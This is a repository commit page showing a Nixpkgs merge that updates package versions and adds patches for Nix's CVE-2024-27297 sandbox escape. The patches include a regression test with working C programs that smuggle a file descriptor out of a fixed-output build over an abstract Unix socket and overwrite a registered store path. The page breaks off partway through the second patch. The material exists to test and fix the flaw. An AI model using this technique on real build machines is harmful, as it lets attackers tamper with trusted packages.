about summary refs log tree commit diff
path: root/nixpkgs/pkgs/tools/package-management
diff options
context:
space:
mode:
authorAlyssa Ross <hi@alyssa.is>2024-03-22 16:41:59 +0100
committerAlyssa Ross <hi@alyssa.is>2024-03-22 16:41:59 +0100
commit46a88117a05c3469af5d99433af140c3de8ca088 (patch)
treed7f0557756d8f07a3081b3498c05ddc5a8ad429d /nixpkgs/pkgs/tools/package-management
parente97457545cea0b2ca421da257c83d8f1ef451d85 (diff)
parenta343533bccc62400e8a9560423486a3b6c11a23b (diff)
downloadnixlib-46a88117a05c3469af5d99433af140c3de8ca088.tar
nixlib-46a88117a05c3469af5d99433af140c3de8ca088.tar.gz
nixlib-46a88117a05c3469af5d99433af140c3de8ca088.tar.bz2
nixlib-46a88117a05c3469af5d99433af140c3de8ca088.tar.lz
nixlib-46a88117a05c3469af5d99433af140c3de8ca088.tar.xz
nixlib-46a88117a05c3469af5d99433af140c3de8ca088.tar.zst
nixlib-46a88117a05c3469af5d99433af140c3de8ca088.zip
Merge commit 'a343533bccc62400e8a9560423486a3b6c11a23b'
Diffstat (limited to 'nixpkgs/pkgs/tools/package-management')
-rw-r--r--nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix8
-rw-r--r--nixpkgs/pkgs/tools/package-management/dnf5/default.nix4
-rw-r--r--nixpkgs/pkgs/tools/package-management/dpkg/default.nix4
-rw-r--r--nixpkgs/pkgs/tools/package-management/nix/common.nix13
-rw-r--r--nixpkgs/pkgs/tools/package-management/nix/default.nix27
-rw-r--r--nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch379
-rw-r--r--nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch407
-rw-r--r--nixpkgs/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch375
-rw-r--r--nixpkgs/pkgs/tools/package-management/pacman/default.nix33
-rw-r--r--nixpkgs/pkgs/tools/package-management/pdm/default.nix4
-rw-r--r--nixpkgs/pkgs/tools/package-management/poetry/unwrapped.nix6
-rw-r--r--nixpkgs/pkgs/tools/package-management/protontricks/default.nix4
12 files changed, 1229 insertions, 35 deletions
diff --git a/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix b/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix
index 72eacb558bb8..ad656ca385e4 100644
--- a/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/deploy-rs/default.nix
@@ -8,16 +8,16 @@
 
 rustPlatform.buildRustPackage {
   pname = "deploy-rs";
-  version = "unstable-2023-12-20";
+  version = "unstable-2024-02-16";
 
   src = fetchFromGitHub {
     owner = "serokell";
     repo = "deploy-rs";
-    rev = "b709d63debafce9f5645a5ba550c9e0983b3d1f7";
-    hash = "sha256-0VUbWBW8VyiDRuimMuLsEO4elGuUw/nc2WDeuO1eN1M=";
+    rev = "0a0187794ac7f7a1e62cda3dabf8dc041f868790";
+    hash = "sha256-dTGGw2y8wvfjr+J9CjQbfdulOq72hUG17HXVNxpH1yE=";
   };
 
-  cargoHash = "sha256-PVeCB1g3JSYE6PKWHyE3hfN/CKlb9XErt8uaD/ZyxIs=";
+  cargoHash = "sha256-Vo/45cZM/sBAaoikhEwCvduhMQjurwSZwCjwrIQn7IA=";
 
   buildInputs = lib.optionals stdenv.isDarwin [
     CoreServices
diff --git a/nixpkgs/pkgs/tools/package-management/dnf5/default.nix b/nixpkgs/pkgs/tools/package-management/dnf5/default.nix
index 129b98867cb0..fc22001a5192 100644
--- a/nixpkgs/pkgs/tools/package-management/dnf5/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/dnf5/default.nix
@@ -30,7 +30,7 @@
 
 stdenv.mkDerivation (finalAttrs: {
   pname = "dnf5";
-  version = "5.1.13";
+  version = "5.1.14";
 
   outputs = [ "out" "man" ];
 
@@ -38,7 +38,7 @@ stdenv.mkDerivation (finalAttrs: {
     owner = "rpm-software-management";
     repo = "dnf5";
     rev = finalAttrs.version;
-    hash = "sha256-6fgQA9L6yBDdtCzxPg+EyxERr/dzW1PWVaT1+lRCXmo=";
+    hash = "sha256-LVemkL3Ysv2hS0/c+ZTqzEKq3kFu+T1rEBwZpjssE2k=";
   };
 
   nativeBuildInputs = [
diff --git a/nixpkgs/pkgs/tools/package-management/dpkg/default.nix b/nixpkgs/pkgs/tools/package-management/dpkg/default.nix
index 59e259541992..b286a7b51b9f 100644
--- a/nixpkgs/pkgs/tools/package-management/dpkg/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/dpkg/default.nix
@@ -18,12 +18,12 @@
 
 stdenv.mkDerivation rec {
   pname = "dpkg";
-  version = "1.22.1";
+  version = "1.22.4";
 
   src = fetchgit {
     url = "https://git.launchpad.net/ubuntu/+source/dpkg";
     rev = "applied/${version}";
-    hash = "sha256-63XRO3Img+XS2F5Krb5DAw0LMhtxB+eJi754O03Lx8Q=";
+    hash = "sha256-tpYSOimBd78rAthQUga/MNraWll9qEA+vRG+/F+t3mM=";
   };
 
   configureFlags = [
diff --git a/nixpkgs/pkgs/tools/package-management/nix/common.nix b/nixpkgs/pkgs/tools/package-management/nix/common.nix
index cab48bbaf5b6..d0840d206b67 100644
--- a/nixpkgs/pkgs/tools/package-management/nix/common.nix
+++ b/nixpkgs/pkgs/tools/package-management/nix/common.nix
@@ -15,6 +15,15 @@ let
   atLeast210 = lib.versionAtLeast version "2.10pre";
   atLeast213 = lib.versionAtLeast version "2.13pre";
   atLeast214 = lib.versionAtLeast version "2.14pre";
+  atLeast220 = lib.versionAtLeast version "2.20pre";
+  atLeast221 = lib.versionAtLeast version "2.21pre";
+  # Major.minor versions unaffected by CVE-2024-27297
+  unaffectedByFodSandboxEscape = [
+    "2.3"
+    "2.18"
+    "2.19"
+    "2.20"
+  ];
 in
 { stdenv
 , autoconf-archive
@@ -40,6 +49,7 @@ in
 , lib
 , libarchive
 , libcpuid
+, libgit2
 , libsodium
 , libxml2
 , libxslt
@@ -118,6 +128,8 @@ self = stdenv.mkDerivation {
     gtest
     libarchive
     lowdown
+  ] ++ lib.optionals atLeast220 [
+    libgit2
   ] ++ lib.optionals stdenv.isDarwin [
     Security
   ] ++ lib.optionals (stdenv.isx86_64) [
@@ -249,6 +261,7 @@ self = stdenv.mkDerivation {
     platforms = platforms.unix;
     outputsToInstall = [ "out" ] ++ optional enableDocumentation "man";
     mainProgram = "nix";
+    knownVulnerabilities = lib.optional (!builtins.elem (lib.versions.majorMinor version) unaffectedByFodSandboxEscape && !atLeast221) "CVE-2024-27297";
   };
 };
 in self
diff --git a/nixpkgs/pkgs/tools/package-management/nix/default.nix b/nixpkgs/pkgs/tools/package-management/nix/default.nix
index c3f970f78fb3..92c988ea5d08 100644
--- a/nixpkgs/pkgs/tools/package-management/nix/default.nix
+++ b/nixpkgs/pkgs/tools/package-management/nix/default.nix
@@ -17,8 +17,19 @@ let
   boehmgc-nix_2_3 = boehmgc.override { enableLargeConfig = true; };
 
   boehmgc-nix = boehmgc-nix_2_3.overrideAttrs (drv: {
-    # Part of the GC solution in https://github.com/NixOS/nix/pull/4944
-    patches = (drv.patches or [ ]) ++ [ ./patches/boehmgc-coroutine-sp-fallback.patch ];
+    patches = (drv.patches or [ ]) ++ [
+      # Part of the GC solution in https://github.com/NixOS/nix/pull/4944
+      ./patches/boehmgc-coroutine-sp-fallback.patch
+
+      # Required since 2.20, and has always been a valid change
+      # Awaiting 8.2 patch release of https://github.com/ivmai/bdwgc/commit/d1d4194c010bff2dc9237223319792cae834501c
+      # or master release of https://github.com/ivmai/bdwgc/commit/86b3bf0c95b66f718c3cb3d35fd7387736c2a4d7
+      (fetchpatch {
+        name = "boehmgc-traceable_allocator-public.diff";
+        url = "https://github.com/NixOS/nix/raw/2.20.0/dep-patches/boehmgc-traceable_allocator-public.diff";
+        hash = "sha256-FLsHY/JS46neiSyyQkVpbHZEFvWSCzWrFQu1CC71sh4=";
+      })
+    ];
   });
 
   # old nix fails to build with newer aws-sdk-cpp and the patch doesn't apply
@@ -156,6 +167,7 @@ in lib.makeExtensible (self: ({
     hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4=";
     patches = [
       patch-monitorfdhup
+      ./patches/2_3/CVE-2024-27297.patch
     ];
     maintainers = with lib.maintainers; [ flokli raitobezarius ];
   }).override { boehmgc = boehmgc-nix_2_3; };
@@ -234,12 +246,21 @@ in lib.makeExtensible (self: ({
     hash = "sha256-WNmifcTsN9aG1ONkv+l2BC4sHZZxtNKy0keqBHXXQ7w=";
     patches = [
       patch-rapidcheck-shared
+      ./patches/2_18/CVE-2024-27297.patch
     ];
   };
 
   nix_2_19 = common {
     version = "2.19.3";
     hash = "sha256-EtL6M0H5+0mFbFh+teVjm+0B+xmHoKwtBvigS5NMWoo=";
+    patches = [
+      ./patches/2_19/CVE-2024-27297.patch
+    ];
+  };
+
+  nix_2_20 = common {
+    version = "2.20.5";
+    hash = "sha256-bfFe38BkoQws7om4gBtBWoNTLkt9piMXdLLoHYl+vBQ=";
   };
 
   # The minimum Nix version supported by Nixpkgs
@@ -261,7 +282,7 @@ in lib.makeExtensible (self: ({
 
   stable = addFallbackPathsCheck self.nix_2_18;
 
-  unstable = self.nix_2_19;
+  unstable = self.nix_2_20;
 } // lib.optionalAttrs config.allowAliases {
   nix_2_4 = throw "nixVersions.nix_2_4 has been removed";
 
diff --git a/nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch b/nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch
new file mode 100644
index 000000000000..8d110d46a6bb
--- /dev/null
+++ b/nixpkgs/pkgs/tools/package-management/nix/patches/2_18/CVE-2024-27297.patch
@@ -0,0 +1,379 @@
+From f8d20e91a45f71b60402f5916d2475751c089c84 Mon Sep 17 00:00:00 2001
+From: Tom Bereknyei <tomberek@gmail.com>
+Date: Fri, 1 Mar 2024 03:42:26 -0500
+Subject: [PATCH 1/3] Add a NixOS test for the sandbox escape
+
+Test that we can't leverage abstract unix domain sockets to leak file
+descriptors out of the sandbox and modify the path after it has been
+registered.
+
+Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io>
+---
+ flake.nix                          |  2 +
+ tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++
+ tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
+ tests/nixos/ca-fd-leak/smuggler.c  | 66 ++++++++++++++++++++++
+ 4 files changed, 223 insertions(+)
+ create mode 100644 tests/nixos/ca-fd-leak/default.nix
+ create mode 100644 tests/nixos/ca-fd-leak/sender.c
+ create mode 100644 tests/nixos/ca-fd-leak/smuggler.c
+
+diff --git a/flake.nix b/flake.nix
+index 230bb6031..4a54c660f 100644
+--- a/flake.nix
++++ b/flake.nix
+@@ -634,6 +634,8 @@
+           ["i686-linux" "x86_64-linux"]
+           (system: runNixOSTestFor system ./tests/nixos/setuid.nix);
+ 
++        tests.ca-fd-leak = runNixOSTestFor "x86_64-linux" ./tests/nixos/ca-fd-leak;
++
+ 
+         # Make sure that nix-env still produces the exact same result
+         # on a particular version of Nixpkgs.
+diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
+new file mode 100644
+index 000000000..a6ae72adc
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/default.nix
+@@ -0,0 +1,90 @@
++# Nix is a sandboxed build system. But Not everything can be handled inside its
++# sandbox: Network access is normally blocked off, but to download sources, a
++# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
++# The detail here is not important, but in our case it means that the hash of
++# the output has to be known beforehand. And if you know that, you get a few
++# rights: you no longer run inside a special network namespace!
++#
++# Now, Linux has a special feature, that not many other unices do: Abstract
++# unix domain sockets! Not only that, but those are namespaced using the
++# network namespace! That means that we have a way to create sockets that are
++# available in every single fixed-output derivation, and also all processes
++# running on the host machine! Now, this wouldn't be that much of an issue, as,
++# well, the whole idea is that the output is pure, and all processes in the
++# sandbox are killed before finalizing the output. What if we didn't need those
++# processes at all? Unix domain sockets have a semi-known trick: you can pass
++# file descriptors around!
++# This makes it possible to exfiltrate a file-descriptor with write access to
++# $out outside of the sandbox. And that file-descriptor can be used to modify
++# the contents of the store path after it has been registered.
++
++{ config, ... }:
++
++let
++  pkgs = config.nodes.machine.nixpkgs.pkgs;
++
++  # Simple C program that sends a a file descriptor to `$out` to a Unix
++  # domain socket.
++  # Compiled statically so that we can easily send it to the VM and use it
++  # inside the build sandbox.
++  sender = pkgs.runCommandWith {
++    name = "sender";
++    stdenv = pkgs.pkgsStatic.stdenv;
++  } ''
++    $CC -static -o $out ${./sender.c}
++  '';
++
++  # Okay, so we have a file descriptor shipped out of the FOD now. But the
++  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
++  # lives in a mount namespace where it is not! So even when this file exists
++  # in the actual Nix store, we're capable of just modifying its contents...
++  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
++
++  # The abstract socket path used to exfiltrate the file descriptor
++  socketName = "FODSandboxExfiltrationSocket";
++in
++{
++  name = "ca-fd-leak";
++
++  nodes.machine =
++    { config, lib, pkgs, ... }:
++    { virtualisation.writableStore = true;
++      nix.settings.substituters = lib.mkForce [ ];
++      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
++    };
++
++  testScript = { nodes }: ''
++    start_all()
++
++    machine.succeed("echo hello")
++    # Start the smuggler server
++    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
++
++    # Build the smuggled derivation.
++    # This will connect to the smuggler server and send it the file descriptor
++    machine.succeed(r"""
++      nix-build -E '
++        builtins.derivation {
++          name = "smuggled";
++          system = builtins.currentSystem;
++          # look ma, no tricks!
++          outputHashMode = "flat";
++          outputHashAlgo = "sha256";
++          outputHash = builtins.hashString "sha256" "hello, world\n";
++          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
++          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
++      }'
++    """.strip())
++
++
++    # Tell the smuggler server that we're done
++    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
++
++    # Check that the file was not modified
++    machine.succeed(r"""
++      cat ./result
++      test "$(cat ./result)" = "hello, world"
++    """.strip())
++  '';
++
++}
+diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
+new file mode 100644
+index 000000000..75e54fc8f
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/sender.c
+@@ -0,0 +1,65 @@
++#include <sys/socket.h>
++#include <sys/un.h>
++#include <stdlib.h>
++#include <stddef.h>
++#include <stdio.h>
++#include <unistd.h>
++#include <fcntl.h>
++#include <errno.h>
++#include <string.h>
++#include <assert.h>
++
++int main(int argc, char **argv) {
++
++    assert(argc == 2);
++
++    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
++
++    // Set up a abstract domain socket path to connect to.
++    struct sockaddr_un data;
++    data.sun_family = AF_UNIX;
++    data.sun_path[0] = 0;
++    strcpy(data.sun_path + 1, argv[1]);
++
++    // Now try to connect, To ensure we work no matter what order we are
++    // executed in, just busyloop here.
++    int res = -1;
++    while (res < 0) {
++        res = connect(sock, (const struct sockaddr *)&data,
++            offsetof(struct sockaddr_un, sun_path)
++              + strlen(argv[1])
++              + 1);
++        if (res < 0 && errno != ECONNREFUSED) perror("connect");
++        if (errno != ECONNREFUSED) break;
++    }
++
++    // Write our message header.
++    struct msghdr msg = {0};
++    msg.msg_control = malloc(128);
++    msg.msg_controllen = 128;
++
++    // Write an SCM_RIGHTS message containing the output path.
++    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
++    hdr->cmsg_len = CMSG_LEN(sizeof(int));
++    hdr->cmsg_level = SOL_SOCKET;
++    hdr->cmsg_type = SCM_RIGHTS;
++    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
++    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
++
++    msg.msg_controllen = CMSG_SPACE(sizeof(int));
++
++    // Write a single null byte too.
++    msg.msg_iov = malloc(sizeof(struct iovec));
++    msg.msg_iov[0].iov_base = "";
++    msg.msg_iov[0].iov_len = 1;
++    msg.msg_iovlen = 1;
++
++    // Send it to the othher side of this connection.
++    res = sendmsg(sock, &msg, 0);
++    if (res < 0) perror("sendmsg");
++    int buf;
++
++    // Wait for the server to close the socket, implying that it has
++    // received the commmand.
++    recv(sock, (void *)&buf, sizeof(int), 0);
++}
+diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
+new file mode 100644
+index 000000000..82acf37e6
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/smuggler.c
+@@ -0,0 +1,66 @@
++#include <sys/socket.h>
++#include <sys/un.h>
++#include <stdlib.h>
++#include <stddef.h>
++#include <stdio.h>
++#include <unistd.h>
++#include <assert.h>
++
++int main(int argc, char **argv) {
++
++    assert(argc == 2);
++
++    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
++
++    // Bind to the socket.
++    struct sockaddr_un data;
++    data.sun_family = AF_UNIX;
++    data.sun_path[0] = 0;
++    strcpy(data.sun_path + 1, argv[1]);
++    int res = bind(sock, (const struct sockaddr *)&data,
++        offsetof(struct sockaddr_un, sun_path)
++        + strlen(argv[1])
++        + 1);
++    if (res < 0) perror("bind");
++
++    res = listen(sock, 1);
++    if (res < 0) perror("listen");
++
++    int smuggling_fd = -1;
++
++    // Accept the connection a first time to receive the file descriptor.
++    fprintf(stderr, "%s\n", "Waiting for the first connection");
++    int a = accept(sock, 0, 0);
++    if (a < 0) perror("accept");
++
++    struct msghdr msg = {0};
++    msg.msg_control = malloc(128);
++    msg.msg_controllen = 128;
++
++    // Receive the file descriptor as sent by the smuggler.
++    recvmsg(a, &msg, 0);
++
++    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
++    while (hdr) {
++        if (hdr->cmsg_level == SOL_SOCKET
++          && hdr->cmsg_type == SCM_RIGHTS) {
++
++            // Grab the copy of the file descriptor.
++            memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
++        }
++
++        hdr = CMSG_NXTHDR(&msg, hdr);
++    }
++    fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
++    close(a);
++
++    // Wait for a second connection, which will tell us that the build is
++    // done
++    a = accept(sock, 0, 0);
++    fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
++    // Write a new content to the file
++    if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
++    char * new_content = "Pwned\n";
++    int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
++    if (written_bytes != strlen(new_content)) perror("write");
++}
+-- 
+2.42.0
+
+
+From 4bc5a3510fa3735798f9ed3a2a30a3ea7b32343a Mon Sep 17 00:00:00 2001
+From: Tom Bereknyei <tomberek@gmail.com>
+Date: Fri, 1 Mar 2024 03:45:39 -0500
+Subject: [PATCH 2/3] Copy the output of fixed-output derivations before
+ registering them
+
+It is possible to exfiltrate a file descriptor out of the build sandbox
+of FODs, and use it to modify the store path after it has been
+registered.
+To avoid that issue, don't register the output of the build, but a copy
+of it (that will be free of any leaked file descriptor).
+
+Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io>
+Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io>
+---
+ src/libstore/build/local-derivation-goal.cc | 6 ++++++
+ src/libutil/filesystem.cc                   | 6 ++++++
+ src/libutil/util.hh                         | 7 +++++++
+ 3 files changed, 19 insertions(+)
+
+diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
+index 64b55ca6a..f1e22f829 100644
+--- a/src/libstore/build/local-derivation-goal.cc
++++ b/src/libstore/build/local-derivation-goal.cc
+@@ -2558,6 +2558,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
+             [&](const DerivationOutput::CAFixed & dof) {
+                 auto & wanted = dof.ca.hash;
+ 
++                // Replace the output by a fresh copy of itself to make sure
++                // that there's no stale file descriptor pointing to it
++                Path tmpOutput = actualPath + ".tmp";
++                copyFile(actualPath, tmpOutput, true);
++                renameFile(tmpOutput, actualPath);
++
+                 auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
+                     .method = dof.ca.method,
+                     .hashType = wanted.type,
+diff --git a/src/libutil/filesystem.cc b/src/libutil/filesystem.cc
+index 11cc0c0e7..2a7787c0e 100644
+--- a/src/libutil/filesystem.cc
++++ b/src/libutil/filesystem.cc
+@@ -133,6 +133,12 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
+     }
+ }
+ 
++
++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
++{
++    return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
++}
++
+ void renameFile(const Path & oldName, const Path & newName)
+ {
+     fs::rename(oldName, newName);
+diff --git a/src/libutil/util.hh b/src/libutil/util.hh
+index b302d6f45..59d42e0a5 100644
+--- a/src/libutil/util.hh
++++ b/src/libutil/util.hh
+@@ -274,6 +274,13 @@ void renameFile(const Path & src, const Path & dst);
+  */
+ void moveFile(const Path & src, const Path & dst);
+ 
++/**
++ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
++ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
++ * with the guaranty that the destination will be “fresh”, with no stale inode
++ * or file descriptor pointing to it).
++ */
++void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
+ 
+ /**
+  * Wrappers arount read()/write() that read/write exactly the
+-- 
+2.42.0
+
+
+From 9e7065bef5469b3024cde2bbc7745530a64fde5b Mon Sep 17 00:00:00 2001
+From: Tom Bereknyei <tomberek@gmail.com>
+Date: Fri, 1 Mar 2024 04:01:23 -0500
+Subject: [PATCH 3/3] Add release notes
+
+Co-authored-by: Theophane Hufschmitt <theophane.hufschmitt@tweag.io>
+---
+ doc/manual/src/release-notes/rl-next.md | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/doc/manual/src/release-notes/rl-next.md b/doc/manual/src/release-notes/rl-next.md
+index c869b5e2f..f77513385 100644
+--- a/doc/manual/src/release-notes/rl-next.md
++++ b/doc/manual/src/release-notes/rl-next.md
+@@ -1 +1,9 @@
+ # Release X.Y (202?-??-??)
++
++- Fix a FOD sandbox escape:
++    Cooperating Nix derivations could send file descriptors to files in the Nix
++    store to each other via Unix domain sockets in the abstract namespace. This
++    allowed one derivation to modify the output of the other derivation, after Nix
++    has registered the path as "valid" and immutable in the Nix database.
++    In particular, this allowed the output of fixed-output derivations to be
++    modified from their expected content. This isn't the case any more.
+-- 
+2.42.0
+
diff --git a/nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch b/nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch
new file mode 100644
index 000000000000..e75b7577af1e
--- /dev/null
+++ b/nixpkgs/pkgs/tools/package-management/nix/patches/2_19/CVE-2024-27297.patch
@@ -0,0 +1,407 @@
+From ca05f6d2038a749f63205fccc4a4daa914a6b95b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
+ <theophane.hufschmitt@tweag.io>
+Date: Mon, 12 Feb 2024 21:28:20 +0100
+Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape
+
+Test that we can't leverage abstract unix domain sockets to leak file
+descriptors out of the sandbox and modify the path after it has been
+registered.
+---
+ tests/nixos/ca-fd-leak/default.nix | 90 ++++++++++++++++++++++++++++++
+ tests/nixos/ca-fd-leak/sender.c    | 65 +++++++++++++++++++++
+ tests/nixos/ca-fd-leak/smuggler.c  | 66 ++++++++++++++++++++++
+ tests/nixos/default.nix            |  2 +
+ 4 files changed, 223 insertions(+)
+ create mode 100644 tests/nixos/ca-fd-leak/default.nix
+ create mode 100644 tests/nixos/ca-fd-leak/sender.c
+ create mode 100644 tests/nixos/ca-fd-leak/smuggler.c
+
+diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
+new file mode 100644
+index 000000000..40e57ea02
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/default.nix
+@@ -0,0 +1,90 @@
++# Nix is a sandboxed build system. But Not everything can be handled inside its
++# sandbox: Network access is normally blocked off, but to download sources, a
++# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
++# The detail here is not important, but in our case it means that the hash of
++# the output has to be known beforehand. And if you know that, you get a few
++# rights: you no longer run inside a special network namespace!
++#
++# Now, Linux has a special feature, that not many other unices do: Abstract
++# unix domain sockets! Not only that, but those are namespaced using the
++# network namespace! That means that we have a way to create sockets that are
++# available in every single fixed-output derivation, and also all processes
++# running on the host machine! Now, this wouldn't be that much of an issue, as,
++# well, the whole idea is that the output is pure, and all processes in the
++# sandbox are killed before finalizing the output. What if we didn't need those
++# processes at all? Unix domain sockets have a semi-known trick: you can pass
++# file descriptors around!
++# This makes it possible to exfiltrate a file-descriptor with write access to
++# $out outside of the sandbox. And that file-descriptor can be used to modify
++# the contents of the store path after it has been registered.
++
++{ config, ... }:
++
++let
++  pkgs = config.nodes.machine.nixpkgs.pkgs;
++
++  # Simple C program that sends a a file descriptor to `$out` to a Unix
++  # domain socket.
++  # Compiled statically so that we can easily send it to the VM and use it
++  # inside the build sandbox.
++  sender = pkgs.runCommandWith {
++    name = "sender";
++    stdenv = pkgs.pkgsStatic.stdenv;
++  } ''
++    $CC -static -o $out ${./sender.c}
++  '';
++
++  # Okay, so we have a file descriptor shipped out of the FOD now. But the
++  # Nix store is read-only, right? .. Well, yeah. But this file descriptor
++  # lives in a mount namespace where it is not! So even when this file exists
++  # in the actual Nix store, we're capable of just modifying its contents...
++  smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
++
++  # The abstract socket path used to exfiltrate the file descriptor
++  socketName = "FODSandboxExfiltrationSocket";
++in
++{
++  name = "ca-fd-leak";
++
++  nodes.machine =
++    { config, lib, pkgs, ... }:
++    { virtualisation.writableStore = true;
++      nix.settings.substituters = lib.mkForce [ ];
++      virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
++    };
++
++  testScript = { nodes }: ''
++    start_all()
++
++    machine.succeed("echo hello")
++    # Start the smuggler server
++    machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
++
++    # Build the smuggled derivation.
++    # This will connect to the smuggler server and send it the file descriptor
++    machine.succeed(r"""
++      nix-build -E '
++        builtins.derivation {
++          name = "smuggled";
++          system = builtins.currentSystem;
++          # look ma, no tricks!
++          outputHashMode = "flat";
++          outputHashAlgo = "sha256";
++          outputHash = builtins.hashString "sha256" "hello, world\n";
++          builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
++          args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
++      }'
++    """.strip())
++
++
++    # Tell the smuggler server that we're done
++    machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
++
++    # Check that the file was modified
++    machine.succeed(r"""
++      cat ./result
++      test "$(cat ./result)" = "hello, world"
++    """.strip())
++  '';
++
++}
+diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
+new file mode 100644
+index 000000000..75e54fc8f
+--- /dev/null
++++ b/tests/nixos/ca-fd-leak/sender.c
+@@ -0,0 +1,65 @@
++#include <sys/socket.h>
++#include <sys/un.h>
++#include <stdlib.h>
++#include <stddef.h>
++#include <stdio.h>
++#include <unistd.h>
++#include <fcntl.h>
++#include <errno.h>
++#include <string.h>
++#include <assert.h>
++
++int main(int argc, char **argv) {
++
++    assert(argc == 2);
++
++    int sock = socket(AF_UNIX, SOCK_STREAM, 0);
++
++    // Set up a abstract domain socket path to connect to.
++    struct sockaddr_un data;
++    data.sun_family = AF_UNIX;
++    data.sun_path[0] = 0;
++    strcpy(data.sun_path + 1, argv[1]);
++
++    // Now try to connect, To ensure we work no matter what order we are
++    // executed in, just busyloop here.
++    int res = -1;
++    while (res < 0) {
++        res = connect(sock, (const struct sockaddr *)&data,
++            offsetof(struct sockaddr_un, sun_path)
++              + strlen(argv[1])
++              + 1);
++        if (res < 0 && errno != ECONNREFUSED) perror("connect");
++        if (errno != ECONNREFUSED) break;
++    }
++
++    // Write our message header.
++    struct msghdr msg = {0};
++    msg.msg_control = malloc(128);
++    msg.msg_controllen = 128;
++
++    // Write an SCM_RIGHTS message containing the output path.
++    struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
++    hdr->cmsg_len = CMSG_LEN(sizeof(int));
++    hdr->cmsg_level = SOL_SOCKET;
++    hdr->cmsg_type = SCM_RIGHTS;
++    int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
++    memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
++
++    msg.msg_controllen = CMSG_SPACE(sizeof(int));
++
++    // Write a single null byte too.
++    msg.msg_iov = malloc(sizeof(struct iovec));
++    msg.msg_iov[0].iov_base = "";
++    msg.msg_iov[0].iov_len = 1;
++    msg.msg_iovlen = 1;
++
++    // Send it to the othher side of this connection.
++    res = sendmsg(sock, &msg, 0);
++    if (res < 0) perror("sendmsg");
++    int buf;
++
++    // Wait for the server to close the socket, implying that it has
++    // received the commmand.
++    recv(sock, (void *)&buf, sizeof(int), 0);
++}
+diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
+new file mode 100644
+index 000000000..82acf37e6
+--- /dev/null
